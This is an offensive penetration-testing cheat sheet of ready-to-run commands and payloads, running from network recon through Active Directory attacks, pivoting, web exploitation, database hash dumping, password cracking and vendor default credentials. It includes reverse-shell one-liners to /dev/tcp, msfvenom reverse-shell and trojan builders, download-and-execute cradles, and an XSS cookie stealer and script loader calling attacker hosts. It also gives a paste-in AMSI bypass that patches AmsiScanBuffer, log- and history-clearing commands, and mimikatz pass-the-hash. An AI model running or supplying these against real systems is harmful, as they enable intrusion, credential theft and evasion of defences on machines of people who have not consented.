Linux

Command Description
nmap -sV -p- -sU -O -A <IP> -oN nmap.txt All ports, OS fingerprint, UDP ports, aggressive scan
nmap -T4 -v -oA myshares --script smb-enum-shares --script-args smbuser=<user>,smbpass=<pass> -p445 <IP> Check for shares
nmap -sP <x.x.x.x>/24 or nmap -sn <x.x.x.x>/24 Host discovery on a network (-sP is the legacy name of -sn)
nmap -O -T5 -PE -F --osscan-limit --max-rtt-timeout 100ms --max-parallelism 100 --min-hostgroup 100 -oX out.xml -iL ip_networks.txt Fast OS-detection sweep of the networks listed in ip_networks.txt
sudo nmap -PE -sn <x.x.x.x>/24 Host discovery on a network, better for Windows as sometimes ICMP ping packets are dropped
for i in $(seq 1 254); do (ping -c 1 10.2.2.${i} | grep "bytes from" &); done; Living off the Land host enumeration
nmap -R -sL --dns-servers <server> x.x.x.0/24 DNS reverse lookup on IP range
nmap <IP> -sS SYN scan
nmap <IP> -sA ACK scan
nmap -n -Pn -vv -O -sV --script smb-enum*,smb-ls,smb-mbenum,smb-os-discovery,smb-s*,smb-vuln*,smbv2* 192.168.1.1 Safe SMB scripts
nmap -sSU -p53 --script dns-nsec-enum --script-args dns-nsec-enum.domains=<domain> <nameserver> Hostname enumeration using nmap
nmap --script broadcast-dhcp-discover Enumerate DHCP server
nmap -sL <ip>/24 | grep "(" | awk '{printf("%s %s\n", $5, $6);}' Reverse DNS sweeping
nmap -sY <IP> Looks for SCTP services with INIT/COOKIE ECHO chunk type
dnsdict6 -s -t 32 <domain> Enumerate IPv6 servers via DNS grinding
smbclient -U user //<IP>/<share> SMB connect
smbmap -H <IP> -R Recursively list all SMB shares and subfolders
enum4linux -a <IP> Enumerate Windows and Linux Samba systems
rpcclient -U "" <target> RPC null authentication
nslookup <domain> A record of a domain
nslookup -query=mx redhat.com Mail Exchange records
nslookup -query=ns redhat.com Name server = maps a domain to a list of DNS servers
nslookup -query=SOA redhat.com Authoritative information of a domain
tcpdump -i eth0 -w out.pcap Capture packets on eth0 and write to file
tcpdump -i eth0 port 80 and dst 2.2.2.2 Capture HTTP traffic to the 2.2.2.2 endpoint
tcpdump -i eth0 -tttt dst <ip> and not net <ip>/24 Show connections to a specific IP
tcpdump -i eth0 'icmp[icmptype] == icmp-echoreply' Print all ping responses (the filter must be wrapped in straight single quotes)
tcpdump -i eth0 -c 50 -tttt 'udp and port 53' Capture 50 DNS packets and print timestamps (the filter must be wrapped in straight single quotes)
tcpdump -x Hex output in packet capture
tcpdump port <port_number> filter by port
tcpdump portrange 21-45 Filter port range
tcpdump src <x.x.x.x> dst <x.x.x.x> filter by src/ destination of packets
tcpdump -S get entire packet
xwd -display <ip>:0 -root -out /tmp/test.xpm Capture a remote X11 display and convert it to JPG
xwud -in /tmp/test.xpm
convert /tmp/test.xpm -resize 1280x1024 /tmp/test.jpg
iptables-save -c > <file> Dump iptables rules (with packet counters) to a file
iptables-restore < <file> Restore iptables rules
iptables -L -v --line-numbers List all iptables rules with line numbers
iptables -F Flush all iptables rules
iptables -P <INPUT/FORWARD/OUTPUT> <ACCEPT/DROP> Change the default policy for packets that don't match any rule
iptables -A OUTPUT -o <iface> -p tcp --dport 22 -m state --state NEW,ESTABLISHED -j ACCEPT Allow SSH on port 22 outbound
iptables -A INPUT -i <iface> -p tcp --sport 22 -m state --state ESTABLISHED -j ACCEPT Allow the return traffic of outbound SSH on port 22
dig -x <IP> Reverse DNS lookup
dig axfr example.com @ns1.example.com DNS Zone transfer
dig <domain> AAAA IPv6 address of domain
dig <domain> MX Mail records
dig <domain> soa SOA record (the admin e-mail is the second field)
dig <domain> ns Name servers
dig <domain> txt TXT records
dig @<nameserver> _kerberos._tcp.<fqdn> SRV +short Discover domain controllers
echo "1" > /proc/sys/net/ipv4/ip_forward Turn on IP forwarding
iptables -t nat -A PREROUTING -p tcp -i eth0 -d <pivot_ip> --dport 443 -j DNAT --to-destination <attack_ip>:443 All three rules below are needed for port forwarding
iptables -t nat -A POSTROUTING -p tcp -o eth0 -s <target_subnet_cidr> -d <attack_ip> --dport 443 -j SNAT --to-source <pivot_ip>
iptables -t filter -I FORWARD 1 -j ACCEPT
sudo iptables -A FORWARD -i <interface-between-box1&2> -o <interface-between-box2&3> -j ACCEPT Forward traffic coming from interface 1 through interface 2
sudo iptables -A FORWARD -i <interface-between-box2&3> -o <interface-between-box1&2> -m state --state ESTABLISHED,RELATED -j ACCEPT Forward traffic coming from interface 2 through to interface 1
sudo iptables -t nat -A POSTROUTING -o <interface-between-box2&3> -j MASQUERADE Masquerade the source IP of forwarded packets (for getting an internet connection through a machine that has internet access)
ssh -R <anyPort>:localhost:22 username@target then ssh username@localhost -p <anyPort> Reverse port forward (allows you to SSH out of a machine that is blocked from external SSH access)
ssh -L 9090:127.0.0.1:9090 dennis@192.168.22.100 Local port forward: expose port 9090 on the remote host's loopback as local port 9090
echo "nameserver x.x.x.x" > /etc/resolv.conf Add DNS server
base64 -w 0 <fileName> and then echo "<base64String>" | base64 -d > out.txt Transfer files via base64
scp <file> user@x.x.x.x:/tmp/file Put file scp
scp user@x.x.x.x:/tmp/file /tmp/file Get file scp
mount /dev/sda1 /mnt/test Mount a filesystem
mount <ip>:/share /mnt/nfs Mount an NFS share
mount -o nolock -t nfs -o proto=tcp,port=2049 172.16.1.1:/ /mnt Mount an NFS share
sudo mount -o vers=3 192.168.22.100:/home/user2 ./user2 Change NFS version; version 4 obfuscates UIDs and GIDs
sudo usermod -u <UID> <username> change UID of user to be able to read nfs files
mount -t cifs -o username=<user>,password=<password>,domain=example.com //WIN_PC_IP/<share name> /mnt/windows mount a Windows share
net use x: \\filesvr001\folder1 <password> /user:domain01\jsmith /savecred /p:no mount a Windows share
sort -u sort unique lines
tar cf file.tar files Create .tar from files
tar xf file.tar Extract .tar files
tar czf file.tar.gz files Create .tar.gz files from files
tar xzf file.tar.gz Extract .tar.gz files
tar cjf file.tar.bz2 files Create .tar.bz2 files from files
tar xjf files.tar.bz2 Extract .tar.bz2 files
gzip file Compress/ rename file
gzip -d file.gz Extract gzip files
upx -9 -o out.exe orig.exe UPX compresses orig.exe into out.exe
zip -r <zipname.zip> <directory> Zips directory
split -b 9K <file> <prefix> Splits file into 9K sized chunks
awk 'sub("$","\r")' unix.txt > win.txt Convert Unix line endings to Windows line endings
find / -iname '*.pdf' -type f Find PDF files
find / -perm -4000 -o -perm -2000 -exec ls -ldb {} \; Search for SUID/SGID files
dos2unix file Windows file to unix file
cat /etc/*syslog*.conf | grep -v "^#" List of log files
grep 'href' <file> | cut -d"/" -f3 | grep <url> | sort -u Extract links to a given host from a file
echo "" > /var/log/auth.log Clear auth logs
echo "" > ~/.bash_history Clear command history
export HISTFILESIZE=0 Set history max file size to 0
export HISTSIZE=0 Set history commands to 0
kill -9 $$ Kill current session
ln -sf /dev/null ~/.bash_history Send all bash history commands to /dev/null
hydra -L users -P passwords -M 21.txt ftp Bruteforce FTP
hydra -L users -P passwords -M 22.txt ssh Bruteforce SSH
hydra -L users -P passwords -M 445.txt smb Bruteforce SMB
crackmapexec <protocol> <targets> -u <UserList> -p "PasswordToSpray" Password spray
crackmapexec smb <ip> -u Administrator -p 'P@ssw0rd' -x whoami Command execution
crackmapexec smb 192.168.215.104 -u Administrator -p 'P@ssw0rd' -M mimikatz -o COMMAND='privilege::debug' Run the mimikatz module
onesixtyone -c /usr/share/metasploit-framework/data/wordlists/snmp_default_pass.txt <IP> bruteforce SNMP, msfconsole, nmap and hydra can also be used
rdesktop <IP> rdp into windows machine
rlogin -l <user> <ip> Login with R* services to a server with the rlogin port open; if misconfigured no password is needed
hydra -l <username> -P <password_file> rlogin://<Victim-IP> -v -V bruteforce rlogin
rexec <ip> remote command execution on ip
rwho <ip>
rsh <ip> Remote shell on system
rsh <IP> <Command>
rsh <IP> -l domain\user <Command>
rcp file.txt <ip>:/path/to/file.txt
rstat Returns kernel performance statistics
ruptime
python /usr/share/responder.py Rogue DHCP server (half duplex, so it does not receive responses from the legitimate DHCP server, only the clients' broadcasts)
ettercap -T -r capture.pcap (or -i <interface>) Grab hashes from RIP authentication
ping6 -c2 -I <interface> ff02::1 Identify IPV6 neighbours
xwd -root -screen -silent -display 192.168.1.109:0 > screenshot.xwd then convert screenshot.xwd screenshot.png Take a screenshot of the server through a vulnerable X11 port
xwininfo -root -tree -display 192.168.1.109:0 Shows information for the X service
xspy <ip> Log keystrokes through a vulnerable X11 service
sudo ifconfig <interface> mtu 1200 Fix ssh hanging issue
rdesktop <ip> RDP option
xfreerdp /v:<ip> /u:<username> RDP when rdesktop doesn’t work
remmina RDP option
cat output.csv | sed 's/,/ ,/g' | column -t -s, | less -S View csv output in command line (use arrow keys to scroll horizontally)
xq <filename> or cat <filename> | xq jq, but for XML files
GetUserSPNs.py -request -dc-ip 192.168.2.160 <DOMAIN.FULL>/<USERNAME>:<PASSWORD> -outputfile hashes.kerberoast Kerberoast users
nbtscan <IP_addr> NBT scan / enumerate NetBios (ports 137, 138, 139)
sslscan <hostname/ip> TLS/SSL check - look for vulnerable versions or potential for downgrade attacks, insecure ciphers etc.

Linux exploits

finger:

RHOST=attacker.com
LFILE=file_to_save
finger x@$RHOST | base64 -d > "$LFILE"
Command Description
sudo find . -exec /bin/sh \; -quit
sudo vim -c ':!/bin/sh'
sudo base64 "$LFILE" | base64 --decode
sudo mysql -e '\! /bin/sh'

Solaris OS

Command Description
dladm show-link Checking network device status
svcadm -t enable service Start service
svcs service display service status
svcs -a display list of services
zpool create <pool_name> <raid_type> <device_name> Create volume group
zfs create <file_system_name> Create file system
zfs mount <file_system_name> Mount file system
zoneadm -z <zone_name> install Basically like docker pull <image name>
showrev -P Patch information
/etc/ftpd/ftpusers Not a command, I know, but the file location for FTP access control on Solaris

Metasploit

Command Description
use auxiliary/scanner/http/dir_scanner Scan for directories
use auxiliary/scanner/http/jboss_vulnscan JBoss scan
use exploit/multi/http/jboss_maindeployer JBoss deploy
use auxiliary/scanner/mssql/mssql_login MSSQL cred scan
use exploit/windows/mssql/mssql_payload MSSQL payload
use auxiliary/scanner/mysql/mysql_version MySQL version scan
use auxiliary/scanner/mysql/mysql_login MySQL login
use auxiliary/scanner/oracle/oracle_login Oracle login
use exploit/windows/dcerpc/ms03_026_dcom
use exploit/windows/smb/ms06_040_netapi
use exploit/windows/smb/ms08_067_netapi
use exploit/windows/smb/ms09_050_smb2_negotiate_func_index
run post/windows/gather/win_privs Show privs of current user
use exploit/windows/local/bypassuac (check if x86/64 and set target) bypass UAC on windows7
load mimikatz -> wdigest dump creds
load incognito -> list_tokens -> impersonate_token Use tokens
use post/windows/gather/credentials/gpp GPP
run post/windows/gather/local_admin_search_enum Test other machines
use exploit/multi/handler Payload handler/ listener for rev shells
use auxiliary/scanner/ipmi/ipmi_version Scan for ipmi interfaces (part of BMCs)
use auxiliary/scanner/ipmi/ipmi_dumphashes dump ipmi hashes
use auxiliary/gather/kerberos_enumusers Enumerate users
use auxiliary/scanner/oracle/sid_enum Enumerate oracle database SID values
use auxiliary/scanner/oracle/sid_brute
use exploit/unix/x11/x11_keyboard_exec Get shell via vulnerable X11 service

msfvenom

Command Description
msfvenom -p windows/exec CMD='net localgroup administrators <user> /add' -f exe-service -o common.exe Service executable malicious payload
msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f exe -o payload.exe Windows meterpreter shell
msfvenom -p windows/shell_reverse_tcp LHOST= LPORT= -f exe -o payload.exe Windows reverse shell
msfvenom -p windows/shell_reverse_tcp LHOST= LPORT= -f py (or c) -b '\x00' -o shellcode.py (or .c) Generate shellcode
msfvenom -p linux/x64/shell_reverse_tcp LHOST= LPORT= -f elf -o payload.elf Linux reverse shell
msfvenom -p linux/x64/shell_reverse_tcp LHOST= LPORT= -x /usr/bin/nc -k -f elf -o payload.elf Create trojan out of a legit binary
msfvenom --platform=solaris --payload=solaris/x86/shell_reverse_tcp LHOST= LPORT= -f elf -e x86/shikata_ga_nai -b '\x00' > solshell.elf Solaris OS

Windows

Command Description
/accepteula If ever using CLI sysinternals tools you need to accept the EULA or you get a really annoying prompt every time you run the tool
reg.exe ADD HKCU\Software\Sysinternals /v EulaAccepted /t REG_DWORD /d 1 /f Removing eula prompt from sysinternals tools
certutil.exe -urlcache -f http://10.0.0.5/40564.exe bad.exe download file with certutil
Invoke-WebRequest -Uri "http://192.168.22.2:8000/nc.exe" -OutFile "c:\tmp\nc.exe" Download file
IEX (New-Object Net.WebClient).DownloadString('http://10.10.14.13:8000/PowerUp.ps1') Download file
powershell.exe -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://10.10.14.13:8000/PowerUp.ps1'); Invoke-AllChecks" Loads powershell script straight into memory
powershell -nop -ep bypass Bypass powershell execution policy
$file = [convert]::ToBase64String((Get-Content -path "c:\tmp\20220613215954_BloodHound.zip" -Encoding byte)) Convert file to base64 for file transfer (copy b64 output and decode on your local kali machine)
[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String("base64String")) Convert from base64 (take base64 input and decode it on the server for file transfer)
netstat -ano List listening ports and connections (same as netstat -tunlp on Linux)
sc query or net start or wmic service get name,startname or Get-Service or Get-Service | Where-Object {$_.Status -eq "Running"} or services List all services on the machine (good for finding a service for CLSIDs)
whoami /priv Enumerate privileges for current user
whoami /all
net user Enumerate all users on the host
ipconfig /all Enumerate current AD Domain
wmic printer list brief Enumerate printers
Get-Printer Enumerate printers
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" Auto-logon credentials
sc config <service> binpath="<path of payload>" Exploit weak service permissions
sc start/stop <> start/stop a service
sc qc <service> Query service configuration/permissions
icacls permissions of a file/ directory
net share List all SMB shares
net use X: \\Server\Share Map network share to drive X (then cd X:\ ) - can use any unused letter
nbtstat -n Retrieve NetBios names of local device
nbtstat -A <IP_addr> Retrieve NetBios name of remote host (01 and 1D indicate the master browser, 03 is the user)
findstr /spin "password" *.* Find the string password in all file types
Import-Module <module, e.g. PowerUp.ps1> Import PowerShell scripts to enhance PowerShell functionality
SCHTASKS /CREATE /SC ONSTART /TN "MyTasks\PERSISTENCE" /TR "c:\windows\temp\implant.exe" Create a scheduled task for persistence (schedules: HOURLY, DAILY, WEEKLY, MONTHLY, ONCE, ONSTART, ONLOGON, ONIDLE and ONEVENT)
ldapdomaindump 192.168.151.175 -u <username> -p <password> Dump LDAP
wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:\windows\\" |findstr /i /v """ List auto-start services outside C:\Windows whose binary path is unquoted

Bypass AMSI

Just copy and paste this entire block into PowerShell

$Win32 = @"

using System;
using System.Runtime.InteropServices;

public class Win32 {

    [DllImport("kernel32")]
    public static extern IntPtr GetProcAddress(IntPtr hModule, string procName);

    [DllImport("kernel32")]
    public static extern IntPtr LoadLibrary(string name);

    [DllImport("kernel32")]
    public static extern bool VirtualProtect(IntPtr lpAddress, UIntPtr dwSize, uint flNewProtect, out uint lpflOldProtect);

}
"@

Add-Type $Win32

$LoadLibrary = [Win32]::LoadLibrary("am" + "si.dll")
$Address = [Win32]::GetProcAddress($LoadLibrary, "Amsi" + "Scan" + "Buffer")
$p = 0
[Win32]::VirtualProtect($Address, [uint32]5, 0x40, [ref]$p)
$Patch = [Byte[]] (0xB8, 0x57, 0x00, 0x07, 0x80, 0xC3)
[System.Runtime.InteropServices.Marshal]::Copy($Patch, 0, $Address, 6)

LDAP enumeration

import ldap3

server = ldap3.Server('10.10.11.152', port=389)
connection = ldap3.Connection(server, "<username>", "<password>")  # leave both blank for a null (anonymous) bind
if not connection.bind():
    raise SystemExit(f"bind failed: {connection.result}")

# domain here is example.com
connection.search(search_base='DC=example,DC=com', search_filter='(&(objectClass=*))', search_scope='SUBTREE', attributes='*')

# ---- Old filter ----
# search_filter='(&(objectCategory=computer)(ms-MCS-AdmPwd=*))', search_scope='SUBTREE', attributes=['ms-MCS-AdmPwd','SAMAccountname'])

print(connection.entries)

print(server.info)

Dump the entire LDAP domain

ldapdomaindump --user 'DOMAIN\USER' --password $PASSWORD --outdir ldapdomaindump $DOMAIN_CONTROLLER

Active Directory (Unauthenticated)

Command Description
enum4linux -a -u "" -p "" <DC IP> && enum4linux -a -u "guest" -p "" <DC IP> Null and Guest access to SMB services
smbmap -u "" -p "" -P 445 -H <DC IP> && smbmap -u "guest" -p "" -P 445 -H <DC IP> Null and Guest access to SMB services
smbclient -U '%' -L //<DC IP> && smbclient -U 'guest%' -L //<DC IP> Null and Guest access to SMB services
nmap -n -sV --script "ldap* and not brute" -p 389 <DC IP> LDAP enumeration
nmap -p 88 --script=krb5-enum-users --script-args="krb5-enum-users.realm='DOMAIN'" <IP> User enumeration
python GetNPUsers.py <domain.com>/ -usersfile usernames.txt -format hashcat -outputfile hashes.asreproast ASREPRoast users
rpcclient -U '' -N 10.10.10.1 RPC null session
GetUserSPNs.py <domain_name>/<domain_user>:<domain_user_password> technically an authenticated attack but usually done before network foothold

Active Directory (Authenticated)

Command Description
net user /domain, Get-DomainUser, wmic useraccount get name,sid Different ways to extract all domain users
net group "domain admins" /domain Check domain admins group
GetADUsers.py -all -dc-ip 10.10.10.110 domain.com/username, enum4linux -a -u "user" -p "password" <DC IP> Different ways to extract all domain users from linux
ConsoleHost_history PowerShell history
net users Enumerate all users
net localgroup Administrators Enumerate users in the administrator group
whoami /all All privileges for your current user
Tasklist /SVC List running services and processes
tasklist /v /fi "username eq system" Filter for processes running as SYSTEM
procdump.exe -accepteula -ma <proc_name_tasklist> Memory dump running processes
net start; wmic service list brief; sc query; Get-Service Get a list of services
accesschk.exe -ucqv <Service_Name> sysinternals tool, Check rights for different groups
net view /all /domain [domainname] All shares on the domain
net share Current shares
netstat -ano Look for open ports
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" 2>nul | findstr /i "DefaultDomainName DefaultUserName DefaultPassword AltDefaultDomainName AltDefaultUserName AltDefaultPassword LastUsedUsername" Stored auto-logon credentials
Get-DomainUser -PreauthNotRequired -verbose List ASREProastable users using PowerView (PowerShell)
Get-ADTrust -Identity <domain> Get trust details for the given domain (PowerShell)
systeminfo | findstr /B /C:"Domain" or echo %userdomain% or ipconfig /all List current domain
runas /user:USERNAME "C:\full\path\of\Program.exe" Run a command as a different user
runas /user:ComputerName\administrator cmd run command as different user on different computer
runas /user:myDomain\administrator cmd
runas /user:<domain\user> cmd
python3 /usr/share/impacket/wmiexec.py test.local/john:password123@10.10.10.1 from linux gain interactive shell on windows machine (needs WMI open)
WMIC /node:target-computer-name process call create "cmd.exe /c task-name"
evil-winrm -i 192.168.1.100 -u Administrator -p 'MySuperSecr3tPass123!' evil-winrm shell from Linux
evil-winrm -i 192.168.1.100 -S -k <private key> -c <public key> evilWinRM with private key
psexec \\computer_name -u username -p password cmd.exe Sysinternals command to run remote commands
Get-AdUser -Server "DC.Domain_A.local" -Identity "Name_of_account" -Properties * Get user info of user in separate domain within trust
impacket-addcomputer '<domain>/user:password' -method LDAPS -computer-name "testPC" -computer-pass 'password' Add a computer to a AD domain
Get-ADComputer <computerName> powershell command to grab properties like SID, DNS hostname of a computer in a domain
Get-NetUser -SPN | select serviceprincipalname PowerView, get user service accounts
sekurlsa::pth /user:<user> /domain:<domain> /ntlm:<hash> /run:cmd.exe mimikatz pass the hash (needs administrator privileges)
Add-Type -AssemblyName System.IdentityModel; New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "ServicePrincipalName" # example SPN: MSSQLSvc/mgmt.domain.local Request a TGS into memory
nltest /domain_trusts view domain trusts

Checking permissions of the processes binaries

for /f "tokens=2 delims='='" %%x in ('wmic process list full^|find /i "executablepath"^|find /i /v "system32"^|find ":"') do (
	for /f eol^=^"^ delims^=^" %%z in ('echo %%x') do (
		icacls "%%z" 2>nul | findstr /i "(F) (M) (W) :\\" | findstr /i ":\\ everyone authenticated users todos %username%" && echo.
	)
)

Checking permissions of the folders of the processes binaries

for /f "tokens=2 delims='='" %%x in ('wmic process list full^|find /i "executablepath"^|find /i /v "system32"^|find ":"') do for /f eol^=^"^ delims^=^" %%y in ('echo %%x') do (
	icacls "%%~dpy\" 2>nul | findstr /i "(F) (M) (W) :\\" | findstr /i ":\\ everyone authenticated users todos %username%" && echo.
)

Chisel

Scenario: you've compromised a host and you are trying to pivot further into the internal network to machines that are not internet facing. What do you do? Create a reverse SOCKS proxy connection with chisel between your Kali machine and the compromised host to forward traffic into the internal network. This way you can nmap or RDP into internal hosts straight from your Kali machine.

Make sure to include this line in /etc/proxychains4.conf

socks5          127.0.0.1 1080
Command Description
chisel server -p 8000 --socks5 --reverse Set up the "server" on your Kali machine
chisel64.exe client 192.168.22.2:8000 R:1080:socks Connect back to the server from the compromised host
proxychains nmap -p 1-1000 -sT -Pn --open -n -T4 --min-parallelism 100 --min-rate 1 --oG proxychains_nmap --append-output Speed up nmap through proxychains
seq 1 1000 | xargs -P 50 -I{} proxychains -q nmap -p {} -sT -Pn --open -n -T4 --min-parallelism 100 --min-rate 1 --oG proxychains_nmap --append-output Much faster nmap through proxychains (one port per parallel process)
grep open/tcp proxychains_nmap | sort | uniq | awk '{print $5}' | cut -d "/" -f 1,3,5 | sort -n Grep the output for the open ports

How does chisel work?

  • good question…

Other tunneling commands

Command Description
ssh -L 127.0.0.1:1234:10.10.10.5:3389 user@10.10.2.30 SSH port forward. Use this to forward packets from 127.0.0.1:1234 to 10.10.10.5:3389 via 10.10.2.30 Now you can RDP into the box with the address 127.0.0.1:3389
ssh -D 1080 yourlab@10.10.2.30 SSH Socks proxy. Make sure to configure /etc/proxychains4.conf like with chisel. Now just run proxychains <yourcommand>
ssh -L 9090:127.0.0.1:9090 user@192.168.22.100 Local port forward. Forwards traffic sent to port 9090 on your localhost to port 9090 on the remote host's loopback.

Webapp

XSS

Command Description
<script>document.write('<img src="http://x.x.x.x:8000/?cookie=' + document.cookie + '" />')</script> Cookie stealer with script tags
<img src=1 href=1 onerror="javascript:console.log('XSS Test')">
<img src/onerror=alert(1)>
<audio src=1 href=1 onerror="javascript:alert(1)"></audio>
<svg onload=alert(1)>
<svg id=x onfocus=alert(1)>
<svg width="400" height="400"> <image href="text:/etc/passwd" height="400" width="400"/></svg> SSRF through PDF generator
<img src='s' onerror="$('body').append('<script src=\'http://attacker.com/xss.js\'>')"> Load a JS payload from your own site (if inline scripts don't work)

SQL injection manually

Command Description
' union select null,null,null,null,null from information_schema.tables;-- Enumerate amount of columns
' UNION SELECT NULL,table_name,table_schema,null,null from information_schema.tables;-- Grab table names
' UNION SELECT null,column_name,null,null,null from information_schema.columns where table_name='<TableName>';-- Grab column names in table
' UNION SELECT null,Username,Password,null,null from <TableName>;-- Exfiltrate information

ADD BLIND AND TIME BASED

Command injection

Command Description
SomeFunctionality=NormalInput;id
&id
&&id
id%00
`id` use backticks
|ls
||ls
$(ls)
> /var/www/html/out.txt Not code execution but could be interesting to redirect output
< /etc/passwd Could send input into something
vuln=127.0.0.1 %0a wget https://web.es/reverse.txt -O /tmp/reverse.php %0a php /tmp/reverse.php
vuln=127.0.0.1; bash -i >& /dev/tcp/<IP>/<PORT> 0>&1
vuln=127.0.0.1&& bash -i >& /dev/tcp/<IP>/<PORT> 0>&1
vuln=127.0.0.1&&bash -i >& /dev/tcp/<IP>/<PORT> 0>&1
vuln=127.0.0.1 && bash -i >& /dev/tcp/<IP>/<PORT> 0>&1 Spacing sometimes can make a difference
?cmd={payload}
time if [ $(whoami|cut -c 1) == s ]; then sleep 5; fi Time-based data exfiltration: this payload sleeps for 5 seconds if the username starts with an s
system('cat%20/etc/passwd')
\n/bin/ls -al\n
%0A/usr/bin/id%0A

Directory enumeration

Command Description
ffuf -u http://<IP>/FUZZ -w /opt/SecLists/Discovery/Web-Content/raft-medium-words.txt Basic enumeration
ffuf -u http://<IP>/FUZZ -w /opt/SecLists/Discovery/Web-Content/raft-medium-words.txt -fw <number> Filter by words
ffuf -u http://<IP>/FUZZ -w /opt/SecLists/Discovery/Web-Content/raft-medium-words.txt -fl <number of lines> Filter by number of lines
ffuf -u http://<IP>/FUZZ -w /opt/SecLists/Discovery/Web-Content/raft-medium-words.txt -fc <response code> Filter out response codes i.e. 404, 403
gobuster dns -d <domain.com> -w /opt/SecLists/Discovery/DNS/subdomains-top1million-5000.txt Subdomain enumeration

Automated Vuln scanning

Command Description

Databases

MySQL

  • port 3306
Command Description
select version(); get version
show databases; show databases
show tables; show tables
use <database name>; enter that database
select * from <table name>; select info from a table
mysql.user password hashes location
SELECT * FROM mysql.user; Password hashes

PostgreSQL

  • port 5432
Command Description
psql -U <user> -h <IP> Remote connection
psql -h <host> -U <username> -d <database> Remote connection
psql -h <host> -p <port> -U <username> -W <database> Remote connection (-W forces a password prompt)
SELECT version(); Get version info
\list List databases
\c <database> Use database
\d List tables
\du+ List user roles
\conninfo Connection information
SHOW hba_file; find config files
SELECT usename, passwd from pg_shadow; Grab password hashes
createdb <database name> Create a database
psql -d <database name> Login locally to database
CREATE TABLE users (ID INT PRIMARY KEY NOT NULL, username character (255) NOT NULL, password character (255) NOT NULL); Create table
INSERT INTO users (ID, username, password) values ('1', 'administrator', '736a125730d192f1560ac2f56798ac958c5f84b086b48a8bc9da3217f9477c6b'); Insert data into table
DROP TABLE <table_name>; Delete table
ALTER USER <user> WITH PASSWORD '<password>'; Change password for user

Metasploit modules

msf> use auxiliary/scanner/postgres/postgres_hashdump
msf> use auxiliary/scanner/postgres/postgres_schemadump
msf> use auxiliary/admin/postgres/postgres_readfile
msf> use exploit/linux/postgres/postgres_payload
msf> use exploit/windows/postgres/postgres_payload

MSSQL

  • TCP/1433 - SQL server port
  • TCP/2433 - Hidden mode
  • TCP/1434 Named instance - Monitor port
  • UDP/1434 SQL Server Browse
  • Password hashes are stored in master.dbo.sysxlogins
Command Description
sqlcmd -U <user> -P <password> Login to MSSQL locally in cmd
'EXEC xp_cmdshell 'powershell -c Invoke-WebRequest -Uri "http://192.168.22.2:8000/nc.exe" -OutFile "C:\windows\Temp\nc.exe"'; -- Command execution with xp_cmdshell (dir, type, ls etc. do not work as stdout won't be displayed)
sqlmap -u "http://<url>" --os-shell Command execution through sqlmap (xp_cmdshell)
SELECT @@version DB version
SELECT name FROM syscolumns WHERE id=(SELECT id FROM sysobjects WHERE name='mytable'); List columns
EXEC sp_databases Show database instances
EXEC sp_helpdb <dbname> Show database description
USE <database name>
EXEC sp_tables Show tables
SELECT name, password FROM master.dbo.sysxlogins Show password hashes

Default accounts

  • SQL 2000 = SA user, blank password
  • SQL 2005 = SA user, password not set

Oracle DB

  • Port 1521
  • Oracle uses something called the Transparent Network Substrate (TNS) for authenticating to their databases. It is a protocol that handles authentication outside of the database.
  • Oracle uses SID values to uniquely identify databases
    • SID values can be bruteforced to discover databases within an Oracle environment (version 9.2.0.7 and below)
    • use auxiliary/scanner/oracle/sid_enum
    • use auxiliary/scanner/oracle/sid_brute
  • Password hashes are stored in sys.user$

nmap -sSV -p1521 -n <IP>

Command Description
SELECT * FROM v$version; DB version
SELECT instance_name FROM v$instance Current DB
SELECT name FROM v$database Current DB
SELECT DISTINCT owner FROM all_tables; List DBs
SELECT user FROM dual; current user
SELECT username FROM all_users ORDER BY username; List users
SELECT column_name FROM all_tab_columns; List columns
SELECT name, password, astatus FROM sys.user$; List password hashes
SELECT username, password FROM dba_users Show database user/password
SELECT name, password FROM SYS.USER$ Shows passwords in DES hash
SELECT name, spare4 FROM SYS.USER$ Show passwords in SHA-1

Default accounts

Username Password
SYS CHANGE_ON_INSTALL
SYSTEM MANAGER
DBSNMP DBSNMP
SYSADM SYSADM
SCOTT TIGER
OUTLN OUTLN
MDSYS MDSYS

Connect to Oracle DB

Windows

CONNECT username/password@<IP>:<PORT>

Linux

$ export ORACLE_HOME=/path/to/oracle/home 			#usually /usr/lib/oracle/<version>/client64/
$ export LD_LIBRARY_PATH="$ORACLE_HOME"
$ export PATH="$ORACLE_HOME:$PATH"

Local:

sqlplus sys as sysdba

Remote:

sqlplus username/password@<IP>/<database>
TNS connectivity with tnscmd10g

tnscmd10g version -h <IP>

SQLmap

Command Description
sqlmap -u "http://<url>" check its injectable
sqlmap -u "http://<url>" --current-db Grab current database
sqlmap -u "http://<url>" -D "database" --tables Grab table names for current DB
sqlmap -u "http://<url>" -D "database" -T "tableName" --dump Get contents of table

Password cracking

Hashcat

hashcat -m 18200 --force -a 0 hashes.asreproast passwords_kerb.txt 
hashcat -m 13100 --force -a 0 hashes.kerberoast rockyou.txt

John

john --wordlist=passwords_kerb.txt hashes.asreproast
john hashList.txt
john --show hashList.txt # show password once hash has been cracked

john --format=krb5tgs --wordlist=rockyou.txt hashes.kerberoast

Default credentials

Vendor Username Passwords
APC apc, device apc
Brocade admin admin123, password, brocade, fibranne
Cisco admin, cisco, enable, hsa, pnadmin, ripeop, root, shelladmin admin, Admin123, default, password, secur4u, cisco, Cisco, _Cisco, cisco123, C1sco!123_, Cisco123, Cisco1234, TANDBERG, change_it, 12345, ipics, pnadmin, diamond, hsadb, c, cc, attack, blender, changeme
Citrix root, nsroot, nsaint, vdiadmin, kvm, cli, admin Citrix321, nsroot, nsmaint, kaviza, kaviza123, freebsd, public, rootadmin, wanscaler
D-Link admin, user private, admin, user
Dell root, user1, admin, vkernel, cli calvin, 123456, password, vkernel, Stor@age!, admin
EMC admin, root, sysadmin EMCPAdm7n, Password#1, Password123#, sysadmin, changeme, emc
HP/3Com admin, root, vcx, app, spvar, manage, hpsupport, opc_op admin, password, hpinvent, iMC123, pvadmin, passw0rd, besgroup, vcx, nice, access, config, 3V@rpar, 3V#rpar, procurve, badg3r5, OpC_op, !manage, !admin
